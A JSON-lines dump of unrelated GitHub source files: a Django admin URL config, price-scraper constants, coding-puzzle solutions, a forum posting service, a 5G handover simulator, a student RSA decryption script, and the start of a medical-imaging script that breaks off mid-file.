+{"seq_id":"26715735920","text":"\"\"\"Gissell URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom .views import IndexView, PersonaLista, PersonaCreate, PersonaActualizar, PersonaEliminar, \\\n TipoPersonaLista, TipoPersonaCreate, TipoPersonaActualizar, TipoPersonaEliminar, \\\n TipoPersonaPersonaLista, TipoPersonaPersonaCreate, TipoPersonaPersonaActualizar, TipoPersonaPersonaEliminar, \\\n TerapiaLista, TerapiaCreate, TerapiaActualizar, TerapiaEliminar, TipoTerapiaLista, TipoTerapiaCreate, \\\n TipoTerapiaActualizar, TipoTerapiaEliminar, DonacionLista, DonacionCreate, DonacionActualizar, DonacionEliminar, \\\n TipoDonacionCreate, TipoDonacionLista, TipoDonacionActualizar, TipoDonacionEliminar, CursoLista, CursoCreate, \\\n CursoActualizar, CursoEliminar, AsignacionLista, AsignacionCreate, AsignacionActualizar, AsignacionEliminar, \\\n NotaLista, NotaCreate, NotaActualizar, NotaEliminar, UnidadLista, UnidadCreate, UnidadActualizar, UnidadEliminar, \\\n generar_pdf_personas, generar_pdf_notas\n\napp_name = 'Admin'\n\nurlpatterns = [\n path('', login_required(IndexView.as_view()), name='Home'),\n # Persona\n path('lista-persona', login_required(PersonaLista.as_view()), name='persona_list'),\n path('crear-persona', login_required(PersonaCreate.as_view()), name='persona_create'),\n path('actualizar-persona//', login_required(PersonaActualizar.as_view()), name='persona_update'),\n path('eliminar-persona//', login_required(PersonaEliminar.as_view()), name='persona_delete'),\n # Tipo Persona\n path('lista-tipo-persona', login_required(TipoPersonaLista.as_view()), name='tipo_persona_list'),\n path('crear-tipo-persona', login_required(TipoPersonaCreate.as_view()), name='tipo_persona_create'),\n path('actualizar-tipo-persona//', login_required(TipoPersonaActualizar.as_view()), name='tipo_persona_update'),\n path('eliminar-tipo-persona//', login_required(TipoPersonaEliminar.as_view()), name='tipo_persona_delete'),\n # Tipo Persona Persona\n path('lista-tipo-persona-persona', login_required(TipoPersonaPersonaLista.as_view()), name='tipo_persona_persona_list'),\n path('crear-tipo-persona-persona', login_required(TipoPersonaPersonaCreate.as_view()), name='tipo_persona_persona_create'),\n path('actualizar-tipo-persona/persona//', login_required(TipoPersonaPersonaActualizar.as_view()), name='tipo_persona_persona_update'),\n path('eliminar-tipo-persona/persona//', login_required(TipoPersonaPersonaEliminar.as_view()), name='tipo_persona_persona_delete'),\n # Terapia\n path('lista-terapia', login_required(TerapiaLista.as_view()), name='terapia_list'),\n path('crear-terapia', login_required(TerapiaCreate.as_view()), name='terapia_create'),\n path('actualizar-terapia//', login_required(TerapiaActualizar.as_view()), name='terapia_update'),\n path('eliminar-terapia//', login_required(TerapiaEliminar.as_view()), name='terapia_delete'),\n # Tipo Terapia\n path('lista-tipo-terapia', login_required(TipoTerapiaLista.as_view()), name='tipo_terapia_list'),\n path('crear-tipo-terapia', login_required(TipoTerapiaCreate.as_view()), name='tipo_terapia_create'),\n path('actualizar-tipo-terapia//', login_required(TipoTerapiaActualizar.as_view()), name='tipo_terapia_update'),\n path('eliminar-tipo-terapia//', login_required(TipoTerapiaEliminar.as_view()), name='tipo_terapia_delete'),\n # Donacion\n path('lista-donacion', login_required(DonacionLista.as_view()), name='donacion_list'),\n path('crear-donacion', login_required(DonacionCreate.as_view()), name='donacion_create'),\n path('actualizar-donacion//', login_required(DonacionActualizar.as_view()), name='donacion_update'),\n path('eliminar-donacion//', login_required(DonacionEliminar.as_view()), name='donacion_delete'),\n # Tipo Donacion\n path('lista-tipo-donacion', login_required(TipoDonacionLista.as_view()), name='tipo_donacion_list'),\n path('crear-tipo-donacion', login_required(TipoDonacionCreate.as_view()), name='tipo_donacion_create'),\n path('actualizar-tipo-donacion//', login_required(TipoDonacionActualizar.as_view()), name='tipo_donacion_update'),\n path('eliminar-tipo-donacion//', login_required(TipoDonacionEliminar.as_view()), name='tipo_donacion_delete'),\n # Tipo Curso\n path('lista-curso', login_required(CursoLista.as_view()), name='curso_list'),\n path('crear-curso', login_required(CursoCreate.as_view()), name='curso_create'),\n path('actualizar-curso//', login_required(CursoActualizar.as_view()), name='curso_update'),\n path('eliminar-curso//', login_required(CursoEliminar.as_view()), name='curso_delete'),\n # Asignación\n path('lista-asignacion', login_required(AsignacionLista.as_view()), name='asignacion_list'),\n path('crear-asignacion', login_required(AsignacionCreate.as_view()), name='asignacion_create'),\n path('actualizar-asignacion//', login_required(AsignacionActualizar.as_view()), name='asignacion_update'),\n path('eliminar-asignacion//', login_required(AsignacionEliminar.as_view()), name='asignacion_delete'),\n # Nota\n path('lista-nota', login_required(NotaLista.as_view()), name='nota_list'),\n path('crear-nota', login_required(NotaCreate.as_view()), name='nota_create'),\n path('actualizar-nota//', login_required(NotaActualizar.as_view()), name='nota_update'),\n path('eliminar-nota//', login_required(NotaEliminar.as_view()), name='nota_delete'),\n # Unidad\n path('lista-unidad', login_required(UnidadLista.as_view()), name='unidad_list'),\n path('crear-unidad', login_required(UnidadCreate.as_view()), name='unidad_create'),\n path('actualizar-unidad//', login_required(UnidadActualizar.as_view()), name='unidad_update'),\n path('eliminar-unidad//', login_required(UnidadEliminar.as_view()), name='unidad_delete'), \n # Reporte\n path('reporte-personas', login_required(generar_pdf_personas), name='reporte_personas'),\n path('reporte-notas', login_required(generar_pdf_notas), name='reporte_notas'),\n]","repo_name":"GerberMaldonado/Gissell","sub_path":"Gissell/Apps/Admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6837,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39923272708","text":"''' API '''\n\n# Base URL for make API calls\nSERVER_URL = 'https://carlos-carvacrack.ddns.net'\n\n\n''' Stablished API Calls for ServerPipeline\n\n Variables:\n LOGIN_CALL\n UPDATE_TOKE_CALL\n CHECK_TOKEN_CALL\n '''\n# API Calls\nLOGIN_CALL = SERVER_URL + '/modular/api/v1/oauth/login'\nUPDATE_TOKEN_CALL = SERVER_URL + '/modular/api/v1/oauth/update-token'\nCHECK_TOKEN_CALL = SERVER_URL + '/modular/api/v1/oauth/verify-token'\n\n\n# Product API Calls\nADD_PRODUCT_CALL = SERVER_URL + '/modular/api/v1/product/scrap'\nUPDATE_PRODUCT_CALL = SERVER_URL + \\\n '/modular/api/v1/product/scrap/?sku={sku}&upc={upc}&store={store}'\nGET_ALL_PRODUCT_CALL = SERVER_URL + \\\n '/modular/api/v1/product?limit=10000000&offset=0'\n\n\n''' \n Constants used in sitemap.py. \n \n Variables:\n STORE_URLS\n KEYWORD\n HEADERS\n'''\n\nSTORE_URLS = {'walmart': 'https://www.walmart.com.mx/sitemap.xml',\n 'sams': 'https://www.sams.com.mx/siteindex.xml',\n 'liverpool': 'https://www.liverpool.com.mx/Sitemap/index.xml',\n 'costco': 'https://www.costco.com.mx/sitemap.xml',\n 'elektra': 'https://www.elektra.com.mx/sitemap.xml',\n 'homedepot': 'https://www.homedepot.com.mx/sitemap_10351.xml'}\n\nKEYWORD = {'walmart': 'product',\n 'sams': 'product',\n 'liverpool': 'detail',\n 'costco': 'product',\n 'elektra': 'product',\n 'homedepot': 'sitemap'}\n\nHEADERS = {'accept': 'application/json, text/javascript, */*; q=0.01',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'es-419,es;q=0.9',\n 'sec-ch-ua': '?0',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-origin',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 OPR/74.0.3911.107',\n 'x-requested-with': 'XMLHttpRequest'}\n\nLIVERPOOL_SERVICE_PAYLOAD = {'accept': 'application/json, text/plain, */*',\n 'accept-encoding': 'gzip, deflate, br',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'Content-Length': '505',\n 'Content-Type': 'application/json;charset=utf-8',\n 'Host': 'www.liverpool.com.mx',\n 'Origin': 'https://www.liverpool.com.mx',\n 'Referer': '',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-origin',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 OPR/74.0.3911.107'}\n","repo_name":"Modular2022/price-tracker-system","sub_path":"scrapper/stores/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"6636876527","text":"with open(\"input.txt\") as f:\r\n number_length = len(\"110000000001\")\r\n lines = f.readlines()\r\n frequencies = [dict() for _ in range(number_length)]\r\n for line in lines:\r\n for bit in range(number_length):\r\n frequencies[bit][line[bit]] = frequencies[bit].get(line[bit], 0) + 1\r\n # frequencies collected\r\n gamma_string = \"\"\r\n epsilon_string = \"\"\r\n for bit in range(number_length):\r\n if frequencies[bit].get(\"0\", 0) > frequencies[bit].get(\"1\", 0):\r\n gamma_string += \"0\"\r\n epsilon_string += \"1\"\r\n else:\r\n gamma_string += \"1\"\r\n epsilon_string += \"0\"\r\n gamma_rate = int(gamma_string, 2)\r\n epsilon_rate = int(epsilon_string, 2)\r\n print(gamma_string, epsilon_string)\r\n print(gamma_rate * epsilon_rate)\r\n","repo_name":"krzyssikora/advent_of_code","sub_path":"aoc_2021/03_1_diagnostic.py","file_name":"03_1_diagnostic.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11673078471","text":"from datetime import datetime\nfrom typing import Tuple\n\nfrom ...database import db\nfrom ...events.board import (\n BoardPostingCreated,\n BoardPostingHidden,\n BoardPostingUnhidden,\n BoardPostingUpdated,\n)\nfrom ...typing import UserID\n\nfrom ..user import service as user_service\nfrom ..user.transfer.models import User\n\nfrom .aggregation_service import aggregate_topic\nfrom .models.posting import Posting as DbPosting\nfrom . import posting_query_service\nfrom . import topic_query_service\nfrom .transfer.models import PostingID, TopicID\n\n\ndef create_posting(\n topic_id: TopicID, creator_id: UserID, body: str\n) -> Tuple[DbPosting, BoardPostingCreated]:\n \"\"\"Create a posting in that topic.\"\"\"\n topic = topic_query_service.get_topic(topic_id)\n creator = _get_user(creator_id)\n\n posting = DbPosting(topic, creator.id, body)\n db.session.add(posting)\n db.session.commit()\n\n aggregate_topic(topic)\n\n event = BoardPostingCreated(\n occurred_at=posting.created_at,\n initiator_id=creator.id,\n initiator_screen_name=creator.screen_name,\n board_id=topic.category.board_id,\n posting_id=posting.id,\n posting_creator_id=creator.id,\n posting_creator_screen_name=creator.screen_name,\n topic_id=topic.id,\n topic_title=topic.title,\n topic_muted=topic.muted,\n url=None,\n )\n\n return posting, event\n\n\ndef update_posting(\n posting_id: PostingID, editor_id: UserID, body: str, *, commit: bool = True\n) -> BoardPostingUpdated:\n \"\"\"Update the posting.\"\"\"\n posting = _get_posting(posting_id)\n editor = _get_user(editor_id)\n\n now = datetime.utcnow()\n\n posting.body = body.strip()\n posting.last_edited_at = now\n posting.last_edited_by_id = editor.id\n posting.edit_count += 1\n\n if commit:\n db.session.commit()\n\n posting_creator = _get_user(posting.creator_id)\n return BoardPostingUpdated(\n occurred_at=now,\n initiator_id=editor.id,\n initiator_screen_name=editor.screen_name,\n board_id=posting.topic.category.board_id,\n posting_id=posting.id,\n posting_creator_id=posting_creator.id,\n posting_creator_screen_name=posting_creator.screen_name,\n topic_id=posting.topic.id,\n topic_title=posting.topic.title,\n editor_id=editor.id,\n editor_screen_name=editor.screen_name,\n url=None,\n )\n\n\ndef hide_posting(\n posting_id: PostingID, moderator_id: UserID\n) -> BoardPostingHidden:\n \"\"\"Hide the posting.\"\"\"\n posting = _get_posting(posting_id)\n moderator = _get_user(moderator_id)\n\n now = datetime.utcnow()\n\n posting.hidden = True\n posting.hidden_at = now\n posting.hidden_by_id = moderator.id\n db.session.commit()\n\n aggregate_topic(posting.topic)\n\n posting_creator = _get_user(posting.creator_id)\n event = BoardPostingHidden(\n occurred_at=now,\n initiator_id=moderator.id,\n initiator_screen_name=moderator.screen_name,\n board_id=posting.topic.category.board_id,\n posting_id=posting.id,\n posting_creator_id=posting_creator.id,\n posting_creator_screen_name=posting_creator.screen_name,\n topic_id=posting.topic.id,\n topic_title=posting.topic.title,\n moderator_id=moderator.id,\n moderator_screen_name=moderator.screen_name,\n url=None,\n )\n\n return event\n\n\ndef unhide_posting(\n posting_id: PostingID, moderator_id: UserID\n) -> BoardPostingUnhidden:\n \"\"\"Un-hide the posting.\"\"\"\n posting = _get_posting(posting_id)\n moderator = _get_user(moderator_id)\n\n now = datetime.utcnow()\n\n # TODO: Store who un-hid the posting.\n posting.hidden = False\n posting.hidden_at = None\n posting.hidden_by_id = None\n db.session.commit()\n\n aggregate_topic(posting.topic)\n\n posting_creator = _get_user(posting.creator_id)\n event = BoardPostingUnhidden(\n occurred_at=now,\n initiator_id=moderator.id,\n initiator_screen_name=moderator.screen_name,\n board_id=posting.topic.category.board_id,\n posting_id=posting.id,\n posting_creator_id=posting_creator.id,\n posting_creator_screen_name=posting_creator.screen_name,\n topic_id=posting.topic.id,\n topic_title=posting.topic.title,\n moderator_id=moderator.id,\n moderator_screen_name=moderator.screen_name,\n url=None,\n )\n\n return event\n\n\ndef delete_posting(posting_id: PostingID) -> None:\n \"\"\"Delete a posting.\"\"\"\n db.session.query(DbPosting) \\\n .filter_by(id=posting_id) \\\n .delete()\n\n db.session.commit()\n\n\ndef _get_posting(posting_id: PostingID) -> DbPosting:\n return posting_query_service.get_posting(posting_id)\n\n\ndef _get_user(user_id: UserID) -> User:\n return user_service.get_user(user_id)\n","repo_name":"FakoorCo/byceps","sub_path":"byceps/services/board/posting_command_service.py","file_name":"posting_command_service.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"71963001079","text":"import fivegmodules.core\nimport numpy as np\n\n__all__ = ['Handover', 'A3Handover', 'HeuristicHandover']\n\nclass Handover:\n def __init__(self):\n pass\n\n def triggerMeasurement(self, device, targetBS):\n raise NotImplementedError\n \n def sendMeasurementReport(self, device, targetBS):\n raise NotImplementedError\n \n def handoverFailure(self, device):\n raise NotImplementedError\n \n def switchBaseStation(self, device, targetBS):\n raise NotImplementedError\n\nclass A3Handover(Handover):\n def __init__(self):\n super(A3Handover, self).__init__()\n self.handoverExecutionFlag = False\n self.handoverPreparationFlag = False\n self.x2Delay = 5 #milliseconds\n self.handoverCount = 0\n self.handoverPreparationStart = 0\n self.handoverFlag = False\n\n ### To solve composition problems\n self.parent = self\n #self.handoverDecisionFunction = \n\n def handovercause(self, device, targetBS):\n if device.lineofsight[device.servingBS][device.env.now] == 0:\n # Handover due to non line of sight condition\n handoverCause = 0\n\n elif (device.calcDist(device.scenarioBasestations[targetBS]) \n < device.calcDist(device.scenarioBasestations[device.servingBS])):\n # Handover due to user mobility, i.e., closer to target BS than to Serving BS\n handoverCause = 1\n\n elif device.listedRSRP[targetBS] > device.listedRSRP[device.servingBS]:\n # Handover due to severe channel fluctuations\n handoverCause = 2\n\n return handoverCause\n\n def loghandovercause(self, device, handoverCause):\n if handoverCause == 0:\n # Handover due to non line of sight condition\n try:\n device.kpi.log['HOC000'] += 1\n except KeyError:\n device.kpi.log['HOC000'] = 1\n\n elif handoverCause == 1:\n # Handover due to user mobility, i.e., closer to target BS than to Serving BS\n try:\n device.kpi.log['HOC001'] += 1\n except KeyError:\n device.kpi.log['HOC001'] = 1\n\n elif handoverCause == 2:\n # Handover due to severe channel fluctuations\n try:\n device.kpi.log['HOC002'] += 1\n except KeyError:\n device.kpi.log['HOC002'] = 1\n\n else:\n # Non specified reason to handover trigger\n try:\n device.kpi.log['HOC099'] += 1\n except KeyError:\n device.kpi.log['HOC099'] = 1\n\n def loghandoverfailure(self, device, failurecode, n):\n try:\n device.kpi.log[failurecode] += n\n except KeyError:\n device.kpi.log[failurecode] = n\n\n def triggerMeasurement(self, device, targetBS):\n counterTTT = 0\n #print(device.env.now, device.sync, device.measOccurring, self.handoverFlag) \n \n if not device.sync:\n self.handoverFailure(device)\n\n # First, check if another measurement is not in progress\n elif not device.measOccurring and not self.handoverFlag:\n # If it is not, check whether it is an A3 event or not\n if (\n (\n device.listedRSRP[targetBS] \n - device.networkParameters.handoverHysteresys\n )\n >= (\n device.listedRSRP[device.servingBS] \n + device.networkParameters.handoverOffset\n + device.networkParameters.handoverHysteresys\n )\n ):\n\n # Given that it is an A3 event, triggers the measurement\n device.measOccurring = True\n device.triggerTime = device.env.now\n self.parent.handoverCount += 1\n\n handoverCause = self.handovercause(device,targetBS)\n \n while counterTTT < device.networkParameters.timeToTrigger:\n yield device.env.timeout(device.networkParameters.timeToMeasure)\n counterTTT += device.networkParameters.timeToMeasure\n \n if device.sync:\n # The A3 condition still valid? If not, stop the timer\n if (\n (\n device.listedRSRP[targetBS] \n - device.networkParameters.handoverHysteresys\n )\n <= (\n device.listedRSRP[device.servingBS] \n + device.networkParameters.handoverOffset\n + device.networkParameters.handoverHysteresys\n )\n ):\n\n # Too earlier handover attempt, might have been just\n # a channel fluctuation\n self.loghandoverfailure(device,'HOF000',1)\n break\n else:\n # Too late handover, user got out-sync in the middle of it\n self.loghandoverfailure(device,'HOF001',1)\n\n device.kpi.handover +=1\n self.handoverFailure(device)\n break\n\n if counterTTT == device.networkParameters.timeToTrigger:\n self.handoverFlag = True\n device.kpi.handover +=1\n \n if device.sync:\n self.loghandovercause(device, handoverCause)\n device.env.process(self.parent.sendMeasurementReport(device, targetBS))\n \n # Too late handover, user got out-sync in the middle of it\n # and will not be able to communicate with Serving BS to complete\n else:\n self.loghandoverfailure(device,'HOF002',1)\n self.handoverFailure(device)\n\n device.measOccurring = False\n device.triggerTime = 0\n \n \n \n def sendMeasurementReport(self, device, targetBS):\n\n #Check if it is not a reassociation\n #if device.listedRSRP[device.servingBS] != None:\n if device.sync:# and (device.servingBSSINR() > device.networkParameters.qualityOut):\n\n # Holds the time to send the RRC:Measurement Report\n yield device.env.timeout(device.networkParameters.RRCMsgTransmissionDelay)\n\n # Check if it is a pingpong, just for kpi assessment\n if device.lastBS.count(targetBS)>0:\n device.kpi.pingpong += 1\n\n #Base stations processing the handover at X2 interface\n self.handoverPreparationFlag = True\n self.handoverPreparationStart = device.env.now\n\n yield device.env.timeout(\n device.scenarioBasestations[device.servingBS].RRCprocessingDelay\n + device.scenarioBasestations[device.servingBS].handoverDecisionDelay\n + 2*self.x2Delay\n + 2*device.scenarioBasestations[targetBS].X2processingDelay\n + device.scenarioBasestations[targetBS].admissionControlDelay)\n\n # Switch to the new BS\n device.env.process(self.switchBaseStation(device, targetBS))\n '''\n else:\n try:\n device.kpi.log['HOF002'] += 1\n except KeyError:\n device.kpi.log['HOF002'] = 1\n self.handoverFailure(device)\n '''\n \n def handoverFailure(self, device):\n device.lastBS.append(device.servingBS)\n device.servingBS = None\n device.reassociationFlag = False\n device.kpi.handoverFail += 1\n \n #device.kpi.association[-1].append(device.env.now+0.2)\n self.handoverFlag = False\n device.sync = False\n\n if self.handoverExecutionFlag:\n device.kpi.association[-1].append(device.env.now)\n\n try:\n device.kpi.outofsync.append([device.env.now])\n except:\n device.kpi.outofsync = [[device.env.now]]\n\n\n def switchBaseStation(self, device, targetBS):\n if device.sync:\n device.lastBS.append(device.servingBS)\n\n # yields for receiving HO Command RRC message and process this message\n yield device.env.timeout(device.networkParameters.RRCMsgTransmissionDelay\n + device.handoverCommandProcDelay)\n\n self.handoverPreparationFlag = False\n\n # Calculates Handover Preparation time\n try:\n device.kpi.log['HOP'].append(device.env.now \n - self.handoverPreparationStart)\n except KeyError:\n device.kpi.log['HOP'] = [device.env.now \n - self.handoverPreparationStart]\n\n '''\n # yields untill the downlink sync is completed\n yield device.env.timeout(\n device.scenarioBasestations[targetBS].nextSSB + \n device.networkParameters.SSBurstDuration - device.env.now\n )\n #'''\n\n # Receiving handover command and turning to RRC Idle untill uplink \n # sync with target BS\n if device.sync: #and not device.T310running:\n disassociation = device.env.now\n device.sync = False\n\n self.handoverExecutionFlag = True\n\n yield device.env.timeout(device.freqReconfigDelay)\n\n '''\n The time gap between the disassociation from the Serving BS to the\n target BS is known as handover interruption time (HIT) and it is\n the for the UE to get synced with the target BS. There is no data\n connection during this time interval, so the UE remains unsynced\n '''\n\n # yields untill the uplink sync is completed and a RACH preamble is sent\n yield device.env.timeout(\n device.scenarioBasestations[targetBS].nextRach + \n device.networkParameters.SSBurstDuration - device.env.now\n )\n\n # Wait for receiving uplink Uplink Grant\n yield device.env.timeout(\n device.scenarioBasestations[targetBS].preambleDetectionDelay\n + device.scenarioBasestations[targetBS].uplinkAllocationDelay\n + device.networkParameters.RRCMsgTransmissionDelay\n + device.uplinkAllocationProcessingDelay\n )\n\n # yields to send RRC Reconfiguration complete message\n yield device.env.timeout(device.networkParameters.RRCMsgTransmissionDelay)\n\n # Checks whether the HO Complete will be successfully sent/received \n # If not, the handover fails\n #if device.listedRSRP[targetBS] > device.networkParameters.qualityOut: \n device.servingBS = targetBS\n if device.servingBSSINR() > device.networkParameters.qualityOut: \n\n # Once the RRC:HO complete is recieved it needs to be processed\n yield device.env.timeout(device.scenarioBasestations[targetBS].RRCprocessingDelay)\n\n # Now the UE is up and downlink synced\n device.sync = True\n self.handoverFlag = False\n device.kpi.association.append(\n [list(device.scenarioBasestations.keys()).index(device.servingBS), device.env.now])\n device.kpi.association[-2].append(disassociation)\n\n try:\n device.kpi.log['HIT'].append(device.env.now - disassociation)\n except KeyError:\n device.kpi.log['HIT'] = [device.env.now - disassociation]\n\n\n else:\n # Handover fail due to not received handover complete\n self.loghandoverfailure(device,'HOF004',1)\n self.handoverFailure(device)\n self.handoverExecutionFlag = False\n\n # Failed to receive Handover Command\n else:\n self.loghandoverfailure(device,'HOF003',1)\n self.handoverFailure(device)\n\n self.handoverPreparationFlag = False\n\n\n\nclass HeuristicHandover(Handover):\n def __init__(self):\n super(HeuristicHandover, self).__init__()\n self.a3 = A3Handover()\n ### To solve composition problems\n self.a3.parent = self\n\n self.decisionHelper = None\n self.decisionData = None\n\n self.handoverExecutionFlag = False\n self.handoverPreparationFlag = False\n self.x2Delay = 5 #milliseconds\n self.handoverCount = 0\n self.handoverPreparationStart = 0\n self.handoverFlag = False\n\n\n def triggerMeasurement(self, device, targetBS):\n return self.a3.triggerMeasurement(device, targetBS)\n \n\n\n def sendMeasurementReport(self, device, targetBS):\n if device.sync:\n # Holds the time to send the RRC:Measurement Report\n yield device.env.timeout(device.networkParameters.RRCMsgTransmissionDelay)\n\n # Check if it is a pingpong, just for kpi assessment\n if device.lastBS.count(targetBS)>0:\n device.kpi.pingpong += 1\n\n #Base stations processing the handover at X2 interface\n self.handoverPreparationFlag = True\n self.a3.handoverPreparationFlag = True\n\n self.handoverPreparationStart = device.env.now\n\n yield device.env.timeout(\n device.scenarioBasestations[device.servingBS].RRCprocessingDelay\n + device.scenarioBasestations[device.servingBS].handoverDecisionDelay)\n\n self.decisionData = self.decisionHelper.getData(device, targetBS)\n if (self.decisionHelper.getDecision(*self.decisionData)):\n yield device.env.timeout(\n + 2*self.x2Delay\n + 2*device.scenarioBasestations[targetBS].X2processingDelay\n + device.scenarioBasestations[targetBS].admissionControlDelay)\n\n # Switch to the new BS\n device.env.process(self.switchBaseStation(device, targetBS))\n\n else:\n self.handoverPreparationFlag = False\n self.a3.handoverPreparationFlag = False\n\n self.handoverFlag = False\n self.a3.handoverFlag = False\n\n device.kpi.handover -=1\n\n yield device.env.timeout(\n device.scenarioBasestations[device.servingBS].RRCprocessingDelay\n + device.scenarioBasestations[device.servingBS].handoverDecisionDelay)\n \n def handoverFailure(self, device):\n return self.a3.handoverFailure(device)\n \n def switchBaseStation(self, device, targetBS):\n return self.a3.switchBaseStation(device, targetBS)\n\nclass DecisionHelper:\n def __init__(self):\n pass\n\n def getDecision(self,*args,**kwargs):\n raise NotImplementedError\n\n def getData(self,device,targetBS):\n raise NotImplementedError\n\nclass PredictionHelper(DecisionHelper):\n def __init__(self):\n super(PredictionHelper, self).__init__()\n self.prediction_window = 0\n self.deteriorate=False\n\n def getDecision(self,serving_prediction, target_prediction):\n serving_score = self.scoringFunction(serving_prediction)\n target_score = self.scoringFunction(target_prediction)\n #print(serving_score, target_score)\n\n if target_score <= serving_score:\n return True\n else:\n return False\n\n def getData(self, device, targetBS):\n init = device.env.now\n end = device.env.now + self.prediction_window\n if not self.deteriorate:\n s_prediction = device.lineofsight[device.servingBS][init:end]\n t_prediction = device.lineofsight[targetBS][init:end]\n return [s_prediction, t_prediction]\n\n\n def scoringFunction(self, prediction):\n score = 0\n burst = False\n n=0\n\n for p, i in enumerate(reversed(prediction)):\n if i == 1:\n burst=False\n n=0\n else:\n burst=True\n n+=1\n\n if burst:\n score += (1+np.log2(p+1))*(2**n)\n\n return np.ceil(score)\n\n\nclass ProbabilityHelper(DecisionHelper):\n def __init__(self):\n super(ProbabilityHelper, self).__init__()\n self.ho_prob = 0\n self.step = 0\n\n def getDecision(self):\n if np.random.rand() <= self.ho_prob:\n return True\n else:\n return False\n\n def getData(self, device, targetBS):\n if device.lastBS == targetBS:\n self.updateProb(-1)\n else:\n self.updateProb(+1)\n\n return None\n\n def updateProb(self, sense=1):\n self.ho_prob += sense*self.step\n","repo_name":"davibrilhante/reliability-optimization","sub_path":"fivegmodules/handover.py","file_name":"handover.py","file_ext":"py","file_size_in_byte":17281,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"3495292771","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the cutTheSticks function below.\ndef cutTheSticks(arr):\n lst=[];\n min_element=0;\n \n while True:\n lst.append(len(arr));\n min_element=min(arr);\n arr=[x for x in arr if x!=min_element];\n arr=[x-min_element for x in arr];\n if arr.count(min_element)==len(arr):\n if len(arr)>0:\n lst.append(len(arr));\n break;\n \n\n #lst.append()\n return lst;\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n arr = list(map(int, input().rstrip().split()))\n\n result = cutTheSticks(arr)\n\n fptr.write('\\n'.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n\n","repo_name":"balachandar-paulraj/Hacker-Rank","sub_path":"Cut_The_Sticks.py","file_name":"Cut_The_Sticks.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36510243901","text":"import argparse\r\nimport random\r\n\r\ndef parse_file(arg_file):\r\n with open(arg_file) as f:\r\n content = f.readlines()\r\n\r\n return content\r\n\r\nclass RSA(object):\r\n\r\n def __init__(self, N, e_or_d, output_file):\r\n self.N = N\r\n self.n = n\r\n self.e_or_d = e_or_d\r\n self.output_file = output_file\r\n\r\n def decrypt(self, number_to_decrypt):\r\n decrypted_number = pow(number_to_decrypt, self.e_or_d, self.N)\r\n self.write_to_file(decrypted_number)\r\n \r\n def unpad(self,padded):\r\n r = random.getrandbits(n/2)\r\n ln = len(str(r))\r\n return padded[ln+2:]\r\n\r\n def write_to_file(self, result):\r\n with open(self.output_file, 'w') as f:\r\n f.write(str(result) + '\\n')\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n required_group = parser.add_argument_group('required arguments')\r\n\r\n required_group.add_argument(\"-k\", \r\n \"--key_file\", \r\n help=\"specifies a file storing a valid RSA key in the example format\",\r\n required=True)\r\n\r\n required_group.add_argument(\"-i\",\r\n \"--input\",\r\n help=\"specifies the path of the file containing an integer in Zn in String form (base 10)\",\r\n required=True)\r\n\r\n required_group.add_argument(\"-o\",\r\n \"--output\",\r\n help=\"specifies the path of the file where the resulting output is stored in String form (base 10)\",\r\n required=True)\r\n\r\n args = parser.parse_args()\r\n key_file_contents = parse_file(args.key_file)\r\n number = parse_file(args.input)[0]\r\n n = int(key_file_contents[0])\r\n N = key_file_contents[1]\r\n e_or_d = key_file_contents[2]\r\n number = int(number,16)\r\n rsa = RSA(int(N), int(e_or_d), args.output)\r\n pd = rsa.unpad(number)\r\n rsa.decrypt(int(pd))","repo_name":"TygaMike/cs483pa3","sub_path":"rsa-dec.py","file_name":"rsa-dec.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36265599003","text":"import os\nimport glob\nimport numpy as np\nimport SimpleITK as sitk\nimport nibabel as nb\nimport itk\n\n\"\"\"\nevery patients have different numbers of lymph node data\ncollect all data, sum and save in nii.gz \nfor convenience\n\nuse nibabel library to save affine information together\n(voxel size, origin)\n\"\"\"\n\nfolder_path = glob.glob('E:/HSE/LungCancerData/test/*/')\n\n# With Nibabel\nfor i in folder_path:\n lymph_path = glob.glob(i + '*lymph_cut.nii.gz')\n # sample_img = nb.load(lymph_path[0])\n sum_lymph = np.zeros((160, 128, 80))\n # 